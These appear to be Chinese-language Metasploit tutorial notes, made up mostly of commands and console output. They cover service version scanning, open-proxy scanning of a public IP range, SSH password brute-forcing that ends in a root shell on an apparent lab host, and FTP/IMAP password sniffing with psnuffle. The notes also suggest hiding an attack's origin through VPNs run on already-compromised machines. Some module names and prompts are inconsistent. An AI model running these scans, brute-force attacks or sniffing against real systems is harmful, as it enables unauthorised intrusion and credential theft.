1、服务扫描
服务查点:利用搜集到的开放的端口运行的服务进行深入挖掘
metasploit中有许多相关工具,大部分都在Scanner辅助模块
常以[service_name]_version(用以遍历主机,确定服务版本)
[service_name]_login(进行口令探测攻击)命名
可输入 search name:_version查看所有服务查点模块
网络服务扫描
①telent服务扫描
msf > use auxiliary/scanner/telent/telent_version
msf auxiliary(ftp_version) > set rhosts 10.10.10.0/24
rhosts => 10.10.10.0/24
msf auxiliary(ftp_version) > set threads 100
threads => 100
msf auxiliary(ftp_version) > run②SSH服务扫描
msf > use auxiliary/scanner/ssh/ssh_version③Oracle数据库服务查点
msf auxiliary(ssh_version) > use auxiliary/scanner/oracle/tnslsnr_version④开放代理探测与利用
隐藏网络身份的技术很多,比如代理服务器(Proxy)、VPN等
open_proxy模块
msf auxiliary(tnslsnr_version) > use auxiliary/scanner/http/open_proxy公开搜集的代理服务器安全性无法得到保障。
隐藏攻击源的方法:可以从公开渠道搜集到一些免费的VPN服务,也可以自己在已控制的主机上架设OpenVPN服务
msf > use auxiliary/scanner/http/open_proxy
msf auxiliary(open_proxy) > set SITE www.google.com
SITE => www.google.com
msf auxiliary(open_proxy) > set RHOSTS 24.25.24.1-24.25.26.254
RHOSTS => 24.25.24.1-24.25.26.254
msf auxiliary(open_proxy) > set MULTIPORTS true
MULTIPORTS => true
msf auxiliary(open_proxy) > set VERIFY_CONNECT true
VERIFY_CONNECT => true
msf auxiliary(open_proxy) > set THREADS 100
THREADS => 100
msf auxiliary(open_proxy) > run
[*] Scanned 99 of 766 hosts (12% complete)
[*] Scanned 186 of 766 hosts (24% complete)
[*] Scanned 236 of 766 hosts (30% complete)
[*] Scanned 327 of 766 hosts (42% complete)
[*] Scanned 416 of 766 hosts (54% complete)
[*] Scanned 472 of 766 hosts (61% complete)
[*] Scanned 550 of 766 hosts (71% complete)
[*] Scanned 636 of 766 hosts (83% complete)
[*] Scanned 694 of 766 hosts (90% complete)
[*] Scanned 766 of 766 hosts (100% complete)
[*] Auxiliary module execution completed2、口令猜解与嗅探
制作一本质量高的字典需要运用社工
1、SSH服务口令猜测
查找到SSH服务,用ssh_login模块对SSH服务进行口令试探攻击,需要一个好的用户名和口令字典
USERNAME指定一个用户名 USER_FILE指定用户名字典
PASSWORD指定一个用户名 PASS_FILE指定用户名字典
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 10.10.10.254
rhosts => 10.10.10.254
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set PASS_FILE /root/words.txt
PASS_FILE => /root/words.txt
msf auxiliary(ssh_login) > set THREADS 50
THREADS => 50
msf auxiliary(ssh_login) > run
[*] SSH - Starting bruteforce
[-] SSH - Failed: 'root:'
[!] No active DB -- Credential data will not be saved!
[-] SSH - Failed: 'root:sadsa'
[-] SSH - Failed: 'root:asfgdssaas'
[-] SSH - Failed: 'root:sadasdf'
[-] SSH - Failed: 'root:we132dds'
[-] SSH - Failed: 'root:root'
[+] SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (10.10.10.128:36651 -> 10.10.10.254:22) at 2017-09-11 22:12:18 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed2、psnuffle口令嗅探
psnuffle是metasploit中的口令嗅探工具,只有在接入对方网络的初始访问点后才能进行嗅探。
msf auxiliary(ssh_login) > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
msf auxiliary(psnuffle) > [*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Failed FTP Login: 10.10.10.254:57922-10.10.10.129:21 >> msfadmin / msfadmin
[*] Failed FTP Login: 10.10.10.254:57922-10.10.10.129:21 >> msfadmin /